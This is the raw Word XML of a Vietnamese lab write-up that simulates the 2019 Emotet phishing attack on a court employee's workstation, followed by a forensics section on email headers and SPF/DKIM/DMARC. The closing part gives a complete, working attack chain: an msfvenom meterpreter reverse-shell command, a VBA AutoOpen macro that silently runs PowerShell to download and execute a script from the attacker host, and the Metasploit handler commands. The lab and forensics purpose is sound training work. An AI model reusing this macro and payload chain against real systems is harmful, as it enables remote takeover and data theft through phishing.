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7405" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Chuẩn bị môi trường (VMware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152EBB30" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Máy ảo Kali Linux (Attacker):</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Đóng vai trò máy chủ điều khiển (C2) và tạo payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCFCBF9" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Máy ảo Windows 10 (Victim):</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Đóng vai trò máy trạm của nhân viên tòa án. </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lưu ý:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Tắt Windows Defender và đưa vào mạng nội bộ (Host-only) để đảm bảo an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD0D764" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mạng:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Cấu hình cả hai máy cùng dải IP nội bộ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3D932" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Các bước Demo mô phỏng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280FF9AE" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1: Tạo Email "bẫy" (Phishing Payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EA49A1" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t>Trong vụ án năm 2019, Emotet xâm nhập qua một email giả mạo có tiêu đề liên quan đến công việc tòa án.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4217488E" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trên Kali Linux:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Sử dụng công cụ như msfvenom hoặc các framework tạo tài liệu Office chứa Macro độc hại (mô phỏng payload của Emotet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124749BA" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tạo file đính kèm:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Một file .doc chứa mã script PowerShell. Khi nạn nhân mở file và chọn "Enable Content", mã độc sẽ thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E42BC0" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2: Phát tán Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736F5404" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve">Kẻ tấn công sử dụng kỹ thuật </w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Email Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> để làm giả địa chỉ người gửi nhằm tạo lòng tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F7138B" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:t>Mắt thường sẽ thấy email đến từ một đồng nghiệp hoặc đối tác uy tín.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B57929" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:t>Thực tế, email này được gửi từ máy ảo Kali qua một công cụ gửi mail rác (như swaks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F6068A" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3: Thực thi mã độc (Infection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E65C4A8" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trên Windows 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Nạn nhân mở email, tải file và kích hoạt Macro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313649C8" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hành vi:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Mã độc Emotet sẽ âm thầm tải các module khác từ máy chủ C2 (Kali Linux) về máy nạn nhân để chiếm quyền điều khiển hoặc đánh cắp thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB954F4" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Phân tích và Điều tra (Forensics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FCB936" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t>Dựa trên tài liệu "Điều tra tấn công Email", bạn có thể thực hiện demo phần điều tra sau sự cố:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3459F24F" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trích xuất Raw Header:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Lấy toàn bộ mã nguồn của email độc hại để tìm dấu vết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B18230" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đọc ngược trường Received:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Đây là "trái tim" của cuộc điều tra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC52D7" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:lastRenderedPageBreak/>
        <w:t>Dòng Received dưới cùng sẽ tiết lộ địa chỉ IP gốc của máy Kali Linux đã phát động tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0462CF10" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kiểm tra xác thực (SPF/DKIM/DMARC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAE3AD4" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:t>Sử dụng kết quả từ Authentication-Results để chứng minh email này bị giả mạo (Spoofing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0013C2B1" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:t>Nếu các chỉ số này báo fail, đó là bằng chứng thép cho thấy nguồn gốc email không hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1120B474" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A1A9F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phân tích Payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> Kiểm tra tệp đính kèm để xác định loại mã độc (Trojan/Malware) và mục tiêu xâm nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7A2D87" w14:textId="45358E3A" w:rsidR="003A1A9F" w:rsidRDefault="00986294">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Nạn nhân nhận được email thông báo vụ việc sáng nay cần đc xem lại khi đó bấm vào và tải file .doc về tưởng vô hại nhưng hại không tưởng được đó là file mà hacker đã chèn thêm 1 lệnh để tải file mã độc từ phía hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7307BA88" w14:textId="77777777" w:rsidR="004D2700" w:rsidRDefault="00986294">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00986294">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19DC92C0" wp14:editId="1CCBC78C">
            <wp:extent cx="5943600" cy="3091180"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="193549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91294" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3091180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A316963" w14:textId="77777777" w:rsidR="004D2700" w:rsidRDefault="004D2700">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2700">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B365DE6" wp14:editId="070A0EC1">
            <wp:extent cx="5943600" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41211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19984" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2750820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AEAE80" w14:textId="77777777" w:rsidR="004D2700" w:rsidRDefault="004D2700">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2700">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A33301A" wp14:editId="222F607B">
            <wp:extent cx="5943600" cy="5397500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="348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8323" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5397500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02855717" w14:textId="77777777" w:rsidR="00D01282" w:rsidRDefault="004D2700">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2700">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BC1EBA9" wp14:editId="55F74FEA">
            <wp:extent cx="5943600" cy="3037840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6327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8719" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3037840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BC011F" w14:textId="77777777" w:rsidR="002F68E7" w:rsidRDefault="00D01282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D01282">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="338AFD65" wp14:editId="4CA43F48">
            <wp:extent cx="5943600" cy="3926205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="113614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49047" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3926205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEF6D1C" w14:textId="24025253" w:rsidR="00986294" w:rsidRDefault="002F68E7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C392A62" wp14:editId="281BACF2">
            <wp:extent cx="5885714" cy="2028571"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1444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9841" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5885714" cy="2028571"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="081CEE28" wp14:editId="58E92A41">
            <wp:extent cx="5933333" cy="2695238"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183502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9626" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5933333" cy="2695238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00986294">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CECD340" w14:textId="77777777" w:rsidR="00986294" w:rsidRPr="00986294" w:rsidRDefault="00986294">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102249CC" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.75.129 LPORT=4444 -f psh-reflection -o madoc.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E75DCB9" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F"/>
    <w:p w14:paraId="5AA14EDE" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t>Sub AutoOpen()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B742F" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve">    Dim shellCommand As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44853199" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve">    ' Dưới đây là lệnh trung gian để kích hoạt PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CCA49B" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve">    shellCommand = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command ""IEX (New-Object Net.WebClient).DownloadString('http://192.168.75.129/madoc.ps1')"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3A8F8" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48062A0E" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve">    ' Lệnh này sẽ thực thi cái đống ở trên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F882D95" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t xml:space="preserve">    Shell shellCommand, vbHide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16498672" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB78AAC" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F"/>
    <w:p w14:paraId="254FB85C" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E606D05" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t>set payload windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54436395" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t>set LHOST 192.168.75.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38503441" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F17561" w14:textId="77777777" w:rsidR="003A1A9F" w:rsidRPr="003A1A9F" w:rsidRDefault="003A1A9F" w:rsidP="003A1A9F">
      <w:r w:rsidRPr="003A1A9F">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2CFBA2" w14:textId="77777777" w:rsidR="00EF654A" w:rsidRDefault="00EF654A"/>
    <w:sectPr w:rsidR="00EF6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A7612"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E84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15FBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A3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93376"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2345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548D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87A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053CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00B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2114">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="308020063">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="826477727">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1642736273">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1725106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9F"/>
    <w:rsid w:val="00150914"/>
    <w:rsid w:val="002F0B53"/>
    <w:rsid w:val="002F68E7"/>
    <w:rsid w:val="003741F4"/>
